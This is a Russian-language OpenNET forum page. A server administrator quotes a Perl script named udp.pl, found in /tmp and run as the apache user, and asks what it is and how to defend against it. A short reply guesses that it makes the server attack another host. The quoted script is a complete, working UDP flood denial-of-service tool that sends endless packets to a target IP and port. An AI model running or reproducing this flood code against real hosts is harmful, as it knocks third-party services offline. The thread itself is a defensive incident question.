The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]



Индекс форумов
Составление сообщения

Исходное сообщение
"Для чего этот скрипт может быть использован?"
Отправлено ncp, 24-Мрт-07 15:07 
>У себя на серваке в папке /tmp/ нашел странный скриптик udp.pl
>Спецы перла, скажите для чего он используется?
>Какие есть методы защиты от проникновения такого в папку тпм?
>
>был запущен от пользователя apache с параметрами 88.158.99.2 80 0
>
>
>Вот содержимое:
>
>code:--------------------------------------------------------------------------------bash-3.00$ cat /tmp/udp.pl
>#!/usr/bin/perl
>###################################################
>################ UDP ATACK FLOOD ##################
>###################################################
>
>use Socket;
>
>$ARGC=@ARGV;
>
>if ($ARGC !=3) {
> printf " \n";
> printf "-------UDP ATACK FLOOD-------\n";
> printf "EX: $0 <ip> <port> <time>\n";
> printf "-----------------------------\n";
> printf " \n";
> exit(1);
>}
>
>my ($ip,$port,$size,$time);
> $ip=$ARGV[0];
> $port=$ARGV[1];
> $time=$ARGV[2];
>
>socket(crazy, PF_INET, SOCK_DGRAM, 17);
>    $iaddr = inet_aton("$ip");
>
>printf " \n";
>printf "-------UDP ATACK FLOOD-------\n";
>printf "Seding flood: $ip:$port\n";
>printf "-----------------------------\n";
>printf " \n";
>
>if ($ARGV[1] ==0 && $ARGV[2] ==0) {
> goto randpackets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto packets;
>}
>if ($ARGV[1] !=0 && $ARGV[2] ==0) {
> goto packets;
>}
>if ($ARGV[1] ==0 && $ARGV[2] !=0) {
> system("(sleep $time;killall -9 udp) &");
> goto randpackets;
>}
>
>packets:
>for (;;) {
> $size=$rand x $rand x $rand;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>}
>
>randpackets:
>for (;;) {
> $size=$rand x $rand x $rand;
> $port=int(rand 65000) +1;
> send(crazy, 0, $size, sockaddr_in($port, $iaddr));
>  --------------------------------------------------------------------------------


В програмировании ничего не понимаю, но скорее всего этот скрипт заставит товй сервер атаковать какой-ибо хост. Это судя по

> printf "-------UDP ATACK FLOOD-------\n";
> printf "EX: $0 <ip> <port> <time>\n";
> printf "-----------------------------\n";

 

Ваше сообщение
Имя*:
EMail:
Для отправки новых сообщений в текущей нити на email укажите знак ! перед адресом, например, !user@host.ru (!! - не показывать email).
Более тонкая настройка отправки ответов производится в профиле зарегистрированного участника форума.
Заголовок*:
Сообщение*:
  Введите код, изображенный на картинке: КОД
 
При общении не допускается: неуважительное отношение к собеседнику, хамство, унизительное обращение, ненормативная лексика, переход на личности, агрессивное поведение, обесценивание собеседника, провоцирование флейма голословными и заведомо ложными заявлениями. Не отвечайте на сообщения, явно нарушающие правила - удаляются не только сами нарушения, но и все ответы на них. Лог модерирования.



Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру